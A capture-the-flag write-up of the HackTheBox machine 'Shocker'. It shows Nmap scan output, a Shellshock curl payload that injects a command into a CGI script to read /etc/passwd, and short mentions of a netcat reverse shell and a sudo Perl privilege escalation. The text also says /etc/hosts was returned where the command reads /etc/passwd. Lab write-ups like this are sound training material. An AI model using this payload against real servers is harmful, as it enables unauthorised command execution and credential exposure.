Shocker - HackTheBox
I started by running an Nmap scan to identify any open ports on the machine.
ββ[root@parrot]β[/home/wackyhacker/Desktop]
ββββΌ nmap -sS --min-rate=5000 -v -Pn -n 10.10.10.56 -oG allPorts
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-03 15:48 CEST
Initiating SYN Stealth Scan at 15:48
Scanning 10.10.10.56 [1000 ports]
Discovered open port 80/tcp on 10.10.10.56
Discovered open port 2222/tcp on 10.10.10.56
Completed SYN Stealth Scan at 15:48, 0.47s elapsed (1000 total ports)
Nmap scan report for 10.10.10.56
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
Raw packets sent: 1038 (45.672KB) | Rcvd: 1018 (40.728KB)
I also did another scan to verify the version and service of each open port.
ββ[root@parrot]β[/home/wackyhacker/Desktop]
ββββΌ nmap -sC -sV -p80,2222 10.10.10.56 -oN targeted
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-03 15:48 CEST
Nmap scan report for 10.10.10.56
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.31 seconds
Apparently I only had two ports, I started with the web server, there was little I could do with the SSH service, this was what I saw.
I didnβt find anything, so I resorted to fuzzing with WZFuzz.
I found a /cgi-bin/, this looked like a full blown shellshock, I fuzzed it with wfuzz, to see if I could find a bash script.
And yes, I found a script called user.sh, to confirm that it was a shellshock I used the script exploit-deface.sh and it was indeed vulnerable to shellshock, I ran the following command sending a GET request via curl to see if it returned the /etc/hosts.
ββ[root@parrot]β[/home/wackyhacker/Desktop]
ββββΌ curl http://10.10.10.56/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
Yes, it returned the contents of /etc/hosts, now I just needed to access the machine, I started a reverse shell using βnetcatβ on port 443 and accessed it.
ESCALADA DE PRIVILEGIOS
Now all that was missing was the privilege escalation, for this I did sudo -l, I saw that I could run Perl with root privileges, I went to gftobing to see if I could escalate privileges in some way with Perl, apparently I could.
I run the command with sudo and give myself superuser permissions.
Leave a comment